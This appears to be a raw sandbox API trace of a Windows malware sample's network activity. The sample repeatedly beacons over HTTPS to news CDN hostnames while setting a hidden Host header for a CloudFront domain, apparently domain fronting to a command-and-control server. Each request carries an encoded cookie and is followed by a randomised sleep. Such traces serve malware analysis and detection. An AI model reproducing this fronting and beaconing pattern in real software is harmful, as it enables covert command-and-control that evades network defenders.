[0272.978] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0272.978] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0272.978] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0272.978] GetLastError () returned 0x0
[0272.978] SetLastError (dwErrCode=0x0)
[0272.978] htonl (hostlong=0xa000000) returned 0xa
[0272.978] htonl (hostlong=0x22000000) returned 0x22
[0272.978] GetLastError () returned 0x0
[0272.979] SetLastError (dwErrCode=0x0)
[0272.979] htonl (hostlong=0xa000000) returned 0xa
[0272.979] htonl (hostlong=0x47000000) returned 0x47
[0272.979] GetLastError () returned 0x0
[0272.979] SetLastError (dwErrCode=0x0)
[0272.979] htonl (hostlong=0xa000000) returned 0xa
[0272.979] htonl (hostlong=0x1f000000) returned 0x1f
[0272.979] GetLastError () returned 0x0
[0272.979] SetLastError (dwErrCode=0x0)
[0272.979] htonl (hostlong=0x7000000) returned 0x7
[0272.979] htonl (hostlong=0x0) returned 0x0
[0272.979] htonl (hostlong=0x8000000) returned 0x8
[0272.979] htonl (hostlong=0x2000000) returned 0x2
[0272.979] htonl (hostlong=0x8000000) returned 0x8
[0272.979] htonl (hostlong=0x6000000) returned 0x6
[0272.979] htonl (hostlong=0x6000000) returned 0x6
[0272.979] GetLastError () returned 0x0
[0272.979] SetLastError (dwErrCode=0x0)
[0272.979] htonl (hostlong=0x0) returned 0x0
[0272.979] GetLastError () returned 0x0
[0272.979] SetLastError (dwErrCode=0x0)
[0272.979] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0272.979] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0272.979] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0272.979] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0273.737] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0273.737] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0273.737] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0273.737] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x21, wSecond=0x12, wMilliseconds=0x38))
[0273.737] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0273.737] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0273.737] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x21, wSecond=0x12, wMilliseconds=0x38))
[0273.737] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x384018) returned 1
[0273.737] CryptGenRandom (in: hProv=0x384018, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0273.737] CryptReleaseContext (hProv=0x384018, dwFlags=0x0) returned 1
[0273.737] Sleep (dwMilliseconds=0x320f)
[0283.751] GetLastError () returned 0x0
[0283.751] SetLastError (dwErrCode=0x0)
[0283.751] GetLastError () returned 0x0
[0283.751] SetLastError (dwErrCode=0x0)
[0283.751] GetLastError () returned 0x0
[0283.751] SetLastError (dwErrCode=0x0)
[0283.752] GetLastError () returned 0x0
[0283.752] SetLastError (dwErrCode=0x0)
[0283.752] GetLastError () returned 0x0
[0283.752] SetLastError (dwErrCode=0x0)
[0283.752] GetLastError () returned 0x0
[0283.752] SetLastError (dwErrCode=0x0)
[0283.752] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0283.752] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0283.752] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0283.752] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0283.752] GetLastError () returned 0x0
[0283.752] SetLastError (dwErrCode=0x0)
[0283.752] htonl (hostlong=0xa000000) returned 0xa
[0283.752] htonl (hostlong=0x22000000) returned 0x22
[0283.752] GetLastError () returned 0x0
[0283.752] SetLastError (dwErrCode=0x0)
[0283.752] htonl (hostlong=0xa000000) returned 0xa
[0283.752] htonl (hostlong=0x47000000) returned 0x47
[0283.752] GetLastError () returned 0x0
[0283.752] SetLastError (dwErrCode=0x0)
[0283.752] htonl (hostlong=0xa000000) returned 0xa
[0283.752] htonl (hostlong=0x1f000000) returned 0x1f
[0283.752] GetLastError () returned 0x0
[0283.752] SetLastError (dwErrCode=0x0)
[0283.752] htonl (hostlong=0x7000000) returned 0x7
[0283.752] htonl (hostlong=0x0) returned 0x0
[0283.752] htonl (hostlong=0x8000000) returned 0x8
[0283.752] htonl (hostlong=0x2000000) returned 0x2
[0283.752] htonl (hostlong=0x8000000) returned 0x8
[0283.752] htonl (hostlong=0x6000000) returned 0x6
[0283.752] htonl (hostlong=0x6000000) returned 0x6
[0283.752] GetLastError () returned 0x0
[0283.752] SetLastError (dwErrCode=0x0)
[0283.752] htonl (hostlong=0x0) returned 0x0
[0283.752] GetLastError () returned 0x0
[0283.752] SetLastError (dwErrCode=0x0)
[0283.752] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0283.752] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0283.752] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0283.752] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0284.427] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0284.427] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0284.427] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0284.427] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x21, wSecond=0x1c, wMilliseconds=0x2e4))
[0284.427] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0284.427] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0284.427] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x21, wSecond=0x1c, wMilliseconds=0x2e4))
[0284.427] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383710) returned 1
[0284.428] CryptGenRandom (in: hProv=0x383710, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0284.428] CryptReleaseContext (hProv=0x383710, dwFlags=0x0) returned 1
[0284.428] Sleep (dwMilliseconds=0x3567)
[0294.437] GetLastError () returned 0x0
[0294.437] SetLastError (dwErrCode=0x0)
[0294.437] GetLastError () returned 0x0
[0294.437] SetLastError (dwErrCode=0x0)
[0294.437] GetLastError () returned 0x0
[0294.437] SetLastError (dwErrCode=0x0)
[0294.437] GetLastError () returned 0x0
[0294.437] SetLastError (dwErrCode=0x0)
[0294.437] GetLastError () returned 0x0
[0294.437] SetLastError (dwErrCode=0x0)
[0294.437] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0294.437] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0294.437] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0294.437] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0294.437] GetLastError () returned 0x0
[0294.437] SetLastError (dwErrCode=0x0)
[0294.437] htonl (hostlong=0xa000000) returned 0xa
[0294.437] htonl (hostlong=0x22000000) returned 0x22
[0294.437] GetLastError () returned 0x0
[0294.438] SetLastError (dwErrCode=0x0)
[0294.438] htonl (hostlong=0xa000000) returned 0xa
[0294.438] htonl (hostlong=0x47000000) returned 0x47
[0294.438] GetLastError () returned 0x0
[0294.438] SetLastError (dwErrCode=0x0)
[0294.438] htonl (hostlong=0xa000000) returned 0xa
[0294.438] htonl (hostlong=0x1f000000) returned 0x1f
[0294.438] GetLastError () returned 0x0
[0294.438] SetLastError (dwErrCode=0x0)
[0294.438] htonl (hostlong=0x7000000) returned 0x7
[0294.438] htonl (hostlong=0x0) returned 0x0
[0294.438] htonl (hostlong=0x8000000) returned 0x8
[0294.438] htonl (hostlong=0x2000000) returned 0x2
[0294.438] htonl (hostlong=0x8000000) returned 0x8
[0294.438] htonl (hostlong=0x6000000) returned 0x6
[0294.438] htonl (hostlong=0x6000000) returned 0x6
[0294.438] GetLastError () returned 0x0
[0294.438] SetLastError (dwErrCode=0x0)
[0294.438] htonl (hostlong=0x0) returned 0x0
[0294.438] GetLastError () returned 0x0
[0294.438] SetLastError (dwErrCode=0x0)
[0294.438] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0294.438] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0294.438] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0294.438] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0295.107] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0295.107] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0295.107] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0295.107] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x21, wSecond=0x27, wMilliseconds=0x1a5))
[0295.107] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0295.107] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0295.107] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x21, wSecond=0x27, wMilliseconds=0x1a5))
[0295.107] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3833e0) returned 1
[0295.108] CryptGenRandom (in: hProv=0x3833e0, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0295.108] CryptReleaseContext (hProv=0x3833e0, dwFlags=0x0) returned 1
[0295.108] Sleep (dwMilliseconds=0x31b8)
[0305.141] GetLastError () returned 0x0
[0305.141] SetLastError (dwErrCode=0x0)
[0305.141] GetLastError () returned 0x0
[0305.141] SetLastError (dwErrCode=0x0)
[0305.141] GetLastError () returned 0x0
[0305.141] SetLastError (dwErrCode=0x0)
[0305.141] GetLastError () returned 0x0
[0305.141] SetLastError (dwErrCode=0x0)
[0305.141] GetLastError () returned 0x0
[0305.141] SetLastError (dwErrCode=0x0)
[0305.141] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0305.141] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0305.141] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0305.142] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0305.142] GetLastError () returned 0x0
[0305.142] SetLastError (dwErrCode=0x0)
[0305.142] htonl (hostlong=0xa000000) returned 0xa
[0305.142] htonl (hostlong=0x22000000) returned 0x22
[0305.142] GetLastError () returned 0x0
[0305.142] SetLastError (dwErrCode=0x0)
[0305.142] htonl (hostlong=0xa000000) returned 0xa
[0305.142] htonl (hostlong=0x47000000) returned 0x47
[0305.142] GetLastError () returned 0x0
[0305.142] SetLastError (dwErrCode=0x0)
[0305.142] htonl (hostlong=0xa000000) returned 0xa
[0305.142] htonl (hostlong=0x1f000000) returned 0x1f
[0305.142] GetLastError () returned 0x0
[0305.142] SetLastError (dwErrCode=0x0)
[0305.142] htonl (hostlong=0x7000000) returned 0x7
[0305.142] htonl (hostlong=0x0) returned 0x0
[0305.142] htonl (hostlong=0x8000000) returned 0x8
[0305.142] htonl (hostlong=0x2000000) returned 0x2
[0305.142] htonl (hostlong=0x8000000) returned 0x8
[0305.142] htonl (hostlong=0x6000000) returned 0x6
[0305.142] htonl (hostlong=0x6000000) returned 0x6
[0305.142] GetLastError () returned 0x0
[0305.142] SetLastError (dwErrCode=0x0)
[0305.142] htonl (hostlong=0x0) returned 0x0
[0305.142] GetLastError () returned 0x0
[0305.142] SetLastError (dwErrCode=0x0)
[0305.142] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0305.142] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0305.142] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0305.142] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0305.823] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0305.823] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0305.823] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0305.823] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x21, wSecond=0x32, wMilliseconds=0x8f))
[0305.823] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0305.823] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0305.823] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x21, wSecond=0x32, wMilliseconds=0x8f))
[0305.823] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3833e0) returned 1
[0305.823] CryptGenRandom (in: hProv=0x3833e0, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0305.823] CryptReleaseContext (hProv=0x3833e0, dwFlags=0x0) returned 1
[0305.823] Sleep (dwMilliseconds=0x3333)
[0315.866] GetLastError () returned 0x0
[0315.866] SetLastError (dwErrCode=0x0)
[0315.866] GetLastError () returned 0x0
[0315.866] SetLastError (dwErrCode=0x0)
[0315.866] GetLastError () returned 0x0
[0315.866] SetLastError (dwErrCode=0x0)
[0315.866] GetLastError () returned 0x0
[0315.866] SetLastError (dwErrCode=0x0)
[0315.866] GetLastError () returned 0x0
[0315.866] SetLastError (dwErrCode=0x0)
[0315.866] GetLastError () returned 0x0
[0315.866] SetLastError (dwErrCode=0x0)
[0315.866] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0315.866] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0315.866] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0315.866] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0315.866] GetLastError () returned 0x0
[0315.866] SetLastError (dwErrCode=0x0)
[0315.866] htonl (hostlong=0xa000000) returned 0xa
[0315.866] htonl (hostlong=0x22000000) returned 0x22
[0315.866] GetLastError () returned 0x0
[0315.866] SetLastError (dwErrCode=0x0)
[0315.866] htonl (hostlong=0xa000000) returned 0xa
[0315.866] htonl (hostlong=0x47000000) returned 0x47
[0315.866] GetLastError () returned 0x0
[0315.866] SetLastError (dwErrCode=0x0)
[0315.866] htonl (hostlong=0xa000000) returned 0xa
[0315.866] htonl (hostlong=0x1f000000) returned 0x1f
[0315.866] GetLastError () returned 0x0
[0315.866] SetLastError (dwErrCode=0x0)
[0315.866] htonl (hostlong=0x7000000) returned 0x7
[0315.866] htonl (hostlong=0x0) returned 0x0
[0315.866] htonl (hostlong=0x8000000) returned 0x8
[0315.866] htonl (hostlong=0x2000000) returned 0x2
[0315.867] htonl (hostlong=0x8000000) returned 0x8
[0315.867] htonl (hostlong=0x6000000) returned 0x6
[0315.867] htonl (hostlong=0x6000000) returned 0x6
[0315.867] GetLastError () returned 0x0
[0315.867] SetLastError (dwErrCode=0x0)
[0315.867] htonl (hostlong=0x0) returned 0x0
[0315.867] GetLastError () returned 0x0
[0315.867] SetLastError (dwErrCode=0x0)
[0315.867] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0315.867] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0315.867] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0315.867] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0316.679] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0316.679] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0316.679] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0316.679] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x22, wSecond=0x1, wMilliseconds=0x5))
[0316.679] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0316.679] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0316.679] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x22, wSecond=0x1, wMilliseconds=0x5))
[0316.679] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383f90) returned 1
[0316.679] CryptGenRandom (in: hProv=0x383f90, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0316.679] CryptReleaseContext (hProv=0x383f90, dwFlags=0x0) returned 1
[0316.679] Sleep (dwMilliseconds=0x31da)
[0326.694] GetLastError () returned 0x0
[0326.694] SetLastError (dwErrCode=0x0)
[0326.694] GetLastError () returned 0x0
[0326.694] SetLastError (dwErrCode=0x0)
[0326.694] GetLastError () returned 0x0
[0326.694] SetLastError (dwErrCode=0x0)
[0326.694] GetLastError () returned 0x0
[0326.694] SetLastError (dwErrCode=0x0)
[0326.694] GetLastError () returned 0x0
[0326.694] SetLastError (dwErrCode=0x0)
[0326.694] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0326.695] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0326.695] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0326.695] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0326.695] GetLastError () returned 0x0
[0326.695] SetLastError (dwErrCode=0x0)
[0326.695] htonl (hostlong=0xa000000) returned 0xa
[0326.695] htonl (hostlong=0x22000000) returned 0x22
[0326.695] GetLastError () returned 0x0
[0326.695] SetLastError (dwErrCode=0x0)
[0326.695] htonl (hostlong=0xa000000) returned 0xa
[0326.695] htonl (hostlong=0x47000000) returned 0x47
[0326.695] GetLastError () returned 0x0
[0326.695] SetLastError (dwErrCode=0x0)
[0326.695] htonl (hostlong=0xa000000) returned 0xa
[0326.695] htonl (hostlong=0x1f000000) returned 0x1f
[0326.695] GetLastError () returned 0x0
[0326.695] SetLastError (dwErrCode=0x0)
[0326.695] htonl (hostlong=0x7000000) returned 0x7
[0326.695] htonl (hostlong=0x0) returned 0x0
[0326.695] htonl (hostlong=0x8000000) returned 0x8
[0326.695] htonl (hostlong=0x2000000) returned 0x2
[0326.695] htonl (hostlong=0x8000000) returned 0x8
[0326.695] htonl (hostlong=0x6000000) returned 0x6
[0326.695] htonl (hostlong=0x6000000) returned 0x6
